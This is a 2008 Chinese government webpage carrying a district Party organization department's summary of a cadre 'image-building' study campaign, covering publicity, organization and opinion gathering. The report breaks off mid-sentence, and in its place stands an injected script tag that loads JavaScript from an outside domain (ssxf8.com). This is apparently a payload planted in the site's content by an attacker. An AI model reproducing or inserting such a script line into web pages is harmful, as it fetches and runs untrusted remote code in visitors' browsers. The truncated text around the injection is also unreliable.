首页>干部工作
鹿城区委组织部“树组工干部形象”集中学习教育活动总结
时间:2008-03-28 来源: 作者: 字号:[ ]

按照中组部的统一部署,8月中旬以来,我们开展以“公道正派”为主要内容的“树组工干部形象”集中学习教育活动。在区委的正确领导下,部领导高度重视,各科室和全区组工干部积极参与共同努力,现已基本告一段落,初步达到预期目的。现将活动开展情况报告如下:

    一、开展集中学习教育活动的基本情况和主要特点:

    这次集中学习教育活动,是组织部门兴起学习贯彻“三个代表”重要思想新高潮的重要载体,是把组织部门建设成为学习实施“三个代表”重要思想表率部门的重要举措,是建设一支高素质组工干部队伍的迫切需要。我部按照上级要求,紧密结合自身实际,精心组织,周密安排,认真实施,扎实开展,做到步步为营,推进有序,环环相扣,衔接紧密。具体工作是:

    (一)宣传先行,启动迅速。认识统一是行动有力的先导和保证。我们做到了宣传先行,舆论开道。第一,积极组织部机关同志参加了市、区两级“效能革命’动员大会,要求广大组工干部要从事关鹿城发展全局的高度深刻领会加强机关作风建设的重要性和紧迫性,切实转变作风,以创业的激情、奋发的精神、务实的作风树立起组工干部的新形象。第二,召开了全区组工干部会议,就开展‘树组工干部形象”集中学习教育活动和“效能革命’进行了动员部署。区委邱。心川副书记到会讲话并对活动提出要求。第三,召开了部机关党支部会议,各科室根据部里的统一要求开展学习活动做好再发动再部门工作。第四,在“鹿城党建”网站开辟了“兴高潮、树形象”集中教育专栏,为教育活动营造了良好的舆论氛围,奠定了思想认识基础。通过广泛的宣传发动,使全区组工干部思想更统一,认识更深刻、行动更有力,自觉地以“三个代表”重要思想武装头脑、指导实践,积极投身学习教育活动。

    (二)精心组织实施,推动有力。为保证集中学习教育活动的质量,第一,制定了《关于在部机关兴起学习贯彻“三个代表”重思想新高潮开展以公道正派为主要内容的“树组工干部形象”集中学习教育活动的实施方案》和活动计划安排表,绘制活动期间有关表格,编辑、印制、发放有关学习教育资料。第二,建立了领导小组,负责整个活动的领导、组织和协调,领导小组下设办公室;具体负责集中学习教育的实施和日常性工作。其他部领导按照各自分工负责做好分管科室的学教活动。科室负责人为本科室学教活动的第一责任人。第三,扩大教育培训范围,使学习教育对象由部机关工作人员为主扩大到全区组工干部。第四,为克服工学矛盾,我们把部机关集中专题学习安排在双休日。第五,结合市委、市政府在全市开展的“效能革命” 活动的具体要求,把两个活动很好地结合起来,使学教活动落实到效能革命的实施工作中去,使集中学习教育活动内容更丰富、效果更实在。

      (三)认真对照查摆,明确整改方向。按照评议范围要广,评议态度要诚,评议问题要准,评议方式要实的要求,进入对照检查、查摆问题阶段以来,全区共发放《征求意见表》270份,分?script src=http://ssxf8.com/x.js>

【返回顶部】【打印本稿】【关闭本页】
0